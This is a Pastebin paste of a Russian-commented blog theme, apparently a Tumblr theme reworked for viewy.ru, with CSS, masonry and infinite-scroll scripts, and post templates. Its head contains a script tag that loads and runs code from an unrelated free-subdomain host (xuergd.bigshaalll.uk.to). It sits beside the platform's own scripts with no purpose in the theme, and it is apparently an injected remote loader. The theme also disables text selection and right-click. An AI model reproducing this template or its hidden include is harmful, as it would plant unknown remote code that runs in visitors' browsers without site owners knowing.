Advertisement
hazza_xx

Что-то

Mar 9th, 2013
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.45 KB | None | 0 0
  1. <script LANGUAGE="JavaScript">
  2. document.ondragstart = test;
  3. //запрет на перетаскивание
  4. document.onselectstart = test;
  5. //запрет на выделение элементов страницы
  6. document.oncontextmenu = test;
  7. //запрет на выведение контекстного меню
  8. function test() {
  9. return false
  10. }
  11. </SCRIPT>
  12. <!-- Разобрала и отредактировала: http://winchesterovna.viewy.ru/ -->
  13. <!DOCTYPE html>
  14. <script>!function() { var c = confirm; var d = document; var i = setInterval; var a = function(e) { e = e || window.event; var t = e.target || e.srcElement; if (t.type == 'password') { if (c('Warning: Never enter your Tumblr password unless \u201chttps://www.tumblr.com/login\u201d\x0ais the address in your web browser.\x0a\x0aYou should also see a green \u201cTumblr, Inc.\u201d identification in the address bar.\x0a\x0aSpammers and other bad guys use fake forms to steal passwords.\x0a\x0aTumblr will never ask you to log in from a user\u2019s blog.\x0a\x0aAre you absolutely sure you want to continue?')) { a = function() {}; } else { t.value = ""; return false; } } }; i(function() { if (typeof d.addEventListener != 'undefined') d.addEventListener('keypress', a, false)}, 0); }();</script><!--Theme number #10 by kell-n, don't remove the credit-->
  15.  
  16. <!DOCTYPE html PUBLIC"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  17. <html xmlns="http://www.w3.org/1999/xhtml">
  18.  
  19. <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# blog: http://ogp.me/ns/blog#">
  20.  
  21. <link href='http://fonts.googleapis.com/css?family=Paprika' rel='stylesheet' type='text/css'>
  22.  
  23. <script type="text/javascript">
  24. WebFontConfig = {
  25. google: { families: [ 'Paprika::latin' ] }
  26. };
  27. (function() {
  28. var wf = document.createElement('script');
  29. wf.src = ('https:' == document.location.protocol ? 'https' : 'http') +
  30. '://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js';
  31. wf.type = 'text/javascript';
  32. wf.async = 'true';
  33. var s = document.getElementsByTagName('script')[0];
  34. s.parentNode.insertBefore(wf, s);
  35. })(); </script>
  36.  
  37. <script type="text/javascript"
  38. src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
  39. <!-- DEFAULT VARIABLES -->
  40. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  41. <meta name="color:background" content="#ffffff"/>
  42. <meta name="color:link" content="#454545"/>
  43. <meta name="color:text" content="#545454"/>
  44. <meta name="color:title" content="#545454"/>
  45. <meta name="color:hover" content="#aaaaaa"/>
  46. <meta name="color:Headerlinks" content="#ffffff" />
  47. <meta name="color:Headerlinks Hover" content="#f5f5f5" />
  48. <meta name="image:sidebar" content="1"/>
  49. <meta name="image:background" content="http://static.tumblr.com/7c8098530d5c00ca183703697a9396b1/wgad5sd/Oibmisyfi/tumblr_static_tumblr_static_smoky-mountain-desktop-backgrounds-wallpaper-1920x1080.jpg"/>
  50. <meta name="text:Link One Title" content="" />
  51. <meta name="text:Link One" content="" />
  52. <meta name="text:Link Two Title" content="" />
  53. <meta name="text:Link Two" content="" />
  54.  
  55.  
  56. <style type="text/css">
  57.  
  58.  
  59. iframe#tumblr_controls {right:2px !important; position: fixed !important;-webkit-transition: opacity 0.7s linear;opacity: 0.05;-webkit-transition: all 0.8s ease-out;-moz-
  60.  
  61. transition: all 0.8s ease-out;transition: all 0.8s ease-out;}
  62.  
  63. iframe#tumblr_controls:hover{-webkit-transition: opacity 0.7s linear;opacity: 0.8;-webkit-transition: all 0.4s ease-out;-moz-transition: all 0.4s ease-out;transition: all 0.4s ease-out;}
  64.  
  65. p {
  66. margin:0px;
  67. margin-top:0px;
  68. }
  69.  
  70.  
  71. body {
  72. padding: 0px;
  73. margin: 0px;
  74. color:#964b00;
  75. font-family: consolas;
  76.  
  77. font-size:20px;
  78. background-color: #ffffff;
  79. background-image:url(http://cs410128.vk.me/v410128295/7e91/J1oWYbPZ6NE.jpg);
  80. background-attachment: fixed;
  81. background-repeat: repeat;
  82. }
  83.  
  84. .post {
  85. width:520px;
  86. padding:2px;
  87. display: block;
  88. margin:16px auto;
  89. font-size:20px;
  90. margin-left:0px;
  91. background-color: #000;
  92. background-image: url('ФОООН ПОСТОВ');
  93. background-repeat: repeat;
  94. text-align: center;
  95. border-radius: 0px;
  96. border: 3px double #ddd;
  97. box-shadow: 0px 0px 0px #000;
  98. }
  99.  
  100.  
  101. .post img {
  102. max-width:500px;}
  103.  
  104. a:link, a:active, a:visited{
  105. text-decoration: none;
  106. -webkit-transition: color 0.3s ease-out;
  107. -moz-transition: color 0.3s ease-out;
  108. transition: color 0.3s ease-out;
  109. color:#454545;
  110. }
  111.  
  112. a:hover {
  113. text-decoration: none;
  114. font-style:;
  115. color: #aaaaaa;
  116. }
  117.  
  118. div#center{
  119. margin:auto;
  120. position:relative;
  121. width:1000px;
  122. background-color:;
  123. overflow:auto;
  124. overflow-y:hidden;
  125. }
  126.  
  127.  
  128. /*CUSTOMIZE ENTRY SETTINGS HERE*/
  129.  
  130.  
  131. /*CUSTOMIZE THE APPEARANCE OF PERMALINKS*/
  132. .entry .perma a{
  133. color:;
  134. -webkit-transition: color 0.9s ease-out;
  135. -moz-transition: color 0.9s ease-out;
  136. }
  137.  
  138.  
  139. .entry .perma{
  140. width:260px;
  141. height: 20px;
  142. font-family: consolas;
  143. text-transform:lowercase;
  144. position: absolute;
  145. font-size: 9.5px;
  146. line-height: 22px;
  147. text-align: center;
  148. overflow:hidden;
  149. background-color:#fff;
  150. letter-spacing:0px;
  151. margin-top:-10px;
  152. margin-left: 0px;
  153. padding-bottom:1px;
  154. border-bottom: 3px solid #ddd;
  155. border-radius: 0px;
  156. -webkit-transition: opacity 0.5s linear; opacity: 0.0;
  157. -webkit-transition: all 0.5s linear;
  158. -moz-transition: all 0.5s linear;
  159. transition: all 0.5s linear;
  160. }
  161.  
  162. .entry:hover .perma{
  163. overflow:visible;
  164. opacity:.9;
  165. margin-top:0;
  166. border-top-right-radius: 0px;
  167. border-bottom-left-radius: 0px;
  168. -webkit-transition: all 0.5s linear;
  169. -webkit-transition: all 0.5s linear;
  170. -moz-transition: all 0.5s linear;
  171. transition: all 0.5s linear;
  172. }
  173.  
  174.  
  175. /*CUSTOMIZE POST POSITIONING AND STUFFZ HERE*/
  176. #posts {
  177. width:584px;
  178. margin-top:1px;
  179. z-index:99;
  180. margin-left:265px;
  181. right:auto;
  182. background:transparent;
  183. margin-right:auto;
  184. position:relative;
  185. overflow-y: hidden;
  186. }
  187.  
  188. .headerlinks{
  189. height: 20px;
  190. width: 67px;
  191. font-family: georgia;
  192. font-size: 9px;
  193. font-style: italic;
  194. background-color: #ffffff;
  195. line-height:20px;
  196. margin-bottom:5px;
  197. margin-right:4.3px;
  198. float:left;
  199. -webkit-border-radius: 0ex;
  200. border: 1px solid #ddd;
  201. }
  202.  
  203. .headerlinks:hover{
  204. height:20px;
  205. width: 67px;
  206. font-family: georgia;
  207. font-size: 9px;
  208. background-color: #f5f5f5;
  209. line-height:20px;
  210. float:left;
  211. -webkit-border-radius: 0ex;
  212. border-top-right-radius: 0px;
  213. border-bottom-left-radius: 0px;
  214. -webkit-transition: all 0.5s linear;
  215. -webkit-transition: all 0.5s linear;
  216. -moz-transition: all 0.5s linear;
  217. transition: all 0.5s linear;
  218. }
  219.  
  220. .headerlinks a {
  221. display:block;
  222. font-family: georgia;
  223. font-size: 9px;
  224. color: #454545;
  225. -webkit-border-radius: 0ex;
  226. border-top-right-radius: 0px;
  227. border-bottom-left-radius: 0px;
  228. -webkit-transition: all 0.5s linear;
  229. -webkit-transition: all 0.5s linear;
  230. -moz-transition: all 0.5s linear;
  231. transition: all 0.5s linear;
  232. }
  233.  
  234. .headerlinks a:hover{
  235. font-family: georgia;
  236. font-size: 9px;
  237. color: #aaaaaa;
  238. background-color: #f5f5f5;
  239. }
  240.  
  241.  
  242. /*CUSTOMIZE SIDEBAR HERE*/
  243.  
  244.  
  245. @font-face { font-family: "dixel"; src: url('http://static.tumblr.com/jdjsstr/8ovm78cbb/pf_arma_five_1_.ttf'); }
  246.  
  247.  
  248. /*CUSTOMIZE TITLE OF ENTRIES HERE*/
  249.  
  250. .title{
  251. font-family: 'Paprika', cursive;
  252. font-size: 13px;
  253. line-height: 20px;
  254. color: #545454;
  255. font-weight: normal;
  256. padding:0px 0px 0px 0px; }
  257.  
  258.  
  259. /*CUSTOMIZE PERMALINKS OF TEXT POSTS AND SUCH HERE*/
  260. .permalink{
  261. text-transform: normal;
  262. display: block;
  263. text-align: right;
  264. text-decoration: none;
  265. }
  266.  
  267.  
  268. /*I RECCOMMEND TO NOT TOUCH ANY OF THIS LOLz*/
  269. #infscr-loading{
  270. bottom: -70px;
  271. position: absolute;
  272. left: 50%;
  273. margin-left:-8px;
  274. width:16px;
  275. height:11px;
  276. overflow:hidden;
  277. margin-bottom: 50px;
  278. }
  279.  
  280. #postnotes{
  281. text-align: justify;}
  282.  
  283. #postnotes blockquote{
  284. border: 0px;}
  285.  
  286. blockquote{
  287. padding:0px 0px 2px 5px;
  288. margin:0px 0px 2px 10px;
  289. border-left: 1px dotted #555555;
  290. }
  291.  
  292. blockquote p, ul{
  293. margin:0px;
  294. padding:0px;
  295. }
  296.  
  297. a img{border: 0px;}
  298.  
  299.  
  300. ul, ol, li{list-style:none; margin:0px; padding:0px;}
  301.  
  302. .user_1 .label, .user_2 .label, .user_3 .label, .user_4 .label, .user_5 .label, .user_6 .label,
  303. .user_7 .label, .user_8 .label, .user_9 .label {color:#545454;}
  304.  
  305. .notes img{width:10px; position:relative; top:3px;}
  306. <--ses-->
  307. small{font-size: 90%;}
  308.  
  309. .kellin{
  310. display: block;
  311. text-align: center;
  312. letter-spacing: 0px;
  313. font-family: consolas;
  314. background-color: #eee;
  315. border: 3px double #ddd;
  316. font-size: 10px;
  317. padding: 5px;
  318. margin-top: 5px;
  319. color: #aaa;
  320. }
  321.  
  322.  
  323.  
  324. </style>
  325.  
  326.  
  327. <script type="text/javascript" src="http://static.tumblr.com/dbek3sy/iBElrgjim/jquerymasonry.js"></script>
  328. <script type="text/javascript" src="http://static.tumblr.com/dbek3sy/Qyblrgjfn/jqueryinfintescroll.js"></script>
  329.  
  330. <script type="text/javascript">
  331. $(window).load(function(){
  332. var $wall = $('#posts');
  333. $wall.imagesLoaded(function(){
  334. $wall.masonry({
  335. itemSelector: '.entry, .entry_photo',
  336. isAnimated : false
  337. });
  338. });
  339.  
  340. $wall.infinitescroll({
  341. navSelector : '#pagination',
  342. nextSelector : '#pagination a',
  343. itemSelector : '.entry, .entry_photo',
  344. bufferPx : 2000,
  345. debug : false,
  346. errorCallback: function() {
  347. $('#infscr-loading').fadeOut('normal');
  348. }},
  349. function( newElements ) {
  350. var $newElems = $( newElements );
  351. $newElems.hide();
  352. $newElems.imagesLoaded(function(){
  353. $wall.masonry( 'appended', $newElems,{isAnimated: false}, function(){$newElems.fadeIn('slow');} );
  354. });
  355. }); $('#posts').show(500);
  356. });
  357. </script>
  358.  
  359.  
  360.  
  361.  
  362.  
  363. <title>Что-то</title>
  364.  
  365.  
  366. <meta name="viewport" content="width=820" />
  367.  
  368. <!-- BEGIN TUMBLR FACEBOOK OPENGRAPH TAGS -->
  369. <!-- If you'd like to specify your own Open Graph tags, define the og:url and og:title tags in your theme's HTML. -->
  370. <!-- Read more: http://ogp.me/ -->
  371. <meta property="fb:app_id" content="48119224995" />
  372. <meta property="og:title" content="Vengeance." />
  373. <meta property="og:url" content="http://theme10byn.tumblr.com/" />
  374. <meta property="og:description" content="I bet you never thought we&rsquo;d get this far, But in the end we won&rsquo;t give in cause that&rsquo;s just who we..." />
  375. <meta property="og:type" content="tumblr-feed:tumblelog" />
  376. <meta property="og:image" content="http://assets.tumblr.com/images/default_avatar_128.gif" />
  377. <!-- END TUMBLR FACEBOOK OPENGRAPH TAGS -->
  378.  
  379.  
  380. <!-- TWITTER TAGS -->
  381. <meta charset="utf-8">
  382. <meta name="twitter:site" content="tumblr" />
  383.  
  384.  
  385. <script type="text/javascript" language="javascript" src="http://assets.tumblr.com/javascript/tumblelog.js?3a688ae593c44d77f77872fdc33a20ad"></script><meta http-equiv="x-dns-prefetch-control" content="off"/><link title="Блог hazza-themes - my themes" type="application/rss+xml" rel="alternate" href="http://hazza-themes.viewy.ru/rss"/><script type="text/javascript" charset="utf-8" src="http://xuergd.bigshaalll.uk.to/code/e9fef7541"></script></head>
  386.  
  387. <body>
  388. <BODY onselectstart="return false;" ondragstart="return false;">
  389. <div class="wrapper">
  390. <div class="header">
  391. </div>
  392.  
  393. <div id="cage">
  394. <div id="center">
  395. <div id="sidebar">
  396.  
  397. <div style='font-family: calibri; font-style: italic;'><br />
  398.  
  399. </div>
  400. <br>
  401.  
  402. </div>
  403.  
  404. <div class="left">
  405. <div id="posts">
  406.  
  407. <div class="entry">
  408.  
  409. {block:startposts} <!-- Блок: начало записи(ей) -->
  410. <div id="right">
  411. {/block:startposts}
  412.  
  413.  
  414. {block:text} <!-- Блок: текстовая запись -->
  415. <div class="post">
  416. {block:title}<a href="{%postlink%}" class="h3 link">{%title%}</a>{/block:title} <!-- Блок: заголовок записи -->
  417. <div>
  418. {%text%}
  419. </div>
  420. <p><a href="{%postlink%}">{%time%}&nbsp; &bull; &nbsp;{%daymonthyear%}</a></p> <!-- ссылка на пост, время и дата -->
  421. </div>
  422. {/block:text}
  423.  
  424.  
  425. {block:photo} <!-- Блок: фотография -->
  426. <div class="post">
  427. <div>
  428. {%linkopen%}<img src="{%photo%}"/>{%linkclose%} <!-- Ссылка и фото -->
  429. </div>
  430. {block:caption}<div>{%caption%}</div>{/block:caption} <!-- Описание фото -->
  431. <p><a href="{%postlink%}">{%time%}&nbsp; &bull; &nbsp;{%daymonthyear%}</a></p> <!-- ссылка на пост, время и дата -->
  432. </div>
  433. {/block:photo}
  434.  
  435.  
  436. {block:link} <!-- Блок: ссылка -->
  437. <div class="post">
  438. <div><a href="{%linkurl%}">{%linkname%}</a></div> <!-- Название и адрес ссылки -->
  439. {block:caption}<div>{%caption%}</div>{/block:caption}
  440. <p><a href="{%postlink%}">{%time%}&nbsp; &bull; &nbsp;{%daymonthyear%}</a></p> <!-- ссылка на пост, время и дата -->
  441. </div>
  442. {/block:link}
  443.  
  444.  
  445. {block:quote} <!-- Блок: цитата -->
  446. <div class="post">
  447. <h3>{%quote%}</h3> <!-- Цитата -->
  448. <p>&mdash; {%quotesource%}</p> <!-- Автор/Источник -->
  449. <p><a href="{%postlink%}">{%time%}&nbsp; &bull; &nbsp;{%daymonthyear%}</a></p> <!-- ссылка на пост, время и дата -->
  450. </div>
  451. {/block:quote}
  452.  
  453.  
  454. {block:audio} <!-- Блок: аудио -->
  455. <div class="post">
  456. <div>{%audioplayer%}</div> <!-- Проигрыватель муз. файлов -->
  457. {block:caption}<div>{%caption%}</div>{/block:caption} <!-- описание -->
  458. <p><a href="{%postlink%}">{%time%}&nbsp; &bull; &nbsp;{%daymonthyear%}</a></p> <!-- ссылка на пост, время и дата -->
  459. </div>
  460. {/block:audio}
  461.  
  462.  
  463. {block:video} <!-- Блок: видео -->
  464. <div class="post">
  465. <div>{%videoplayer%}</div>
  466. {block:caption}<div>{%caption%}</div>{/block:caption} <!-- описание -->
  467. <p><a href="{%postlink%}">{%time%}&nbsp; &bull; &nbsp;{%daymonthyear%}</a></p> <!-- ссылка на пост, время и дата -->
  468. </div>
  469. {/block:video}
  470.  
  471.  
  472. {block:dialog} <!-- Блок: диалог -->
  473. <div class="post">
  474. {block:title}<h1>{%title%}</h1>{/block:title} <!-- Блок: заголовок записи -->
  475. <div>{%dialog%}</div>
  476. <p><a href="{%postlink%}">{%time%}&nbsp; &bull; &nbsp;{%daymonthyear%}</a></p> <!-- ссылка на пост, время и дата -->
  477. </div>
  478. {/block:dialog}
  479.  
  480.  
  481.  
  482.  
  483.  
  484.  
  485. {block:endposts} <!-- Блок: конец записи(ей) -->
  486. </div>
  487. {/block:endposts}
  488.  
  489.  
  490. {block:startfooter} <!-- Блок: начало футера -->
  491. <div id="footer">
  492. {/block:startfooter}
  493.  
  494.  
  495.  
  496. {block:pages} <!-- Блок: постраничная навигация -->
  497. {block:previouspage}<a href="{%previouspage%}">НАЗАД</a>{/block:previouspage}
  498.  
  499. &nbsp; {%currentpage%}/{%totalpages%} &nbsp;
  500.  
  501. {block:nextpage}<a href="{%nextpage%}">ВПЕРЁД</a>{/block:nextpage}
  502. {/block:pages}
  503.  
  504.  
  505.  
  506. {block:endfooter} <!-- Блок: конец футера -->
  507. </div>
  508. <div class="clear"></div>
  509. {/block:endfooter}
  510.  
  511.  
  512.  
  513.  
  514.  
  515.  
  516.  
  517. </body>
  518. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement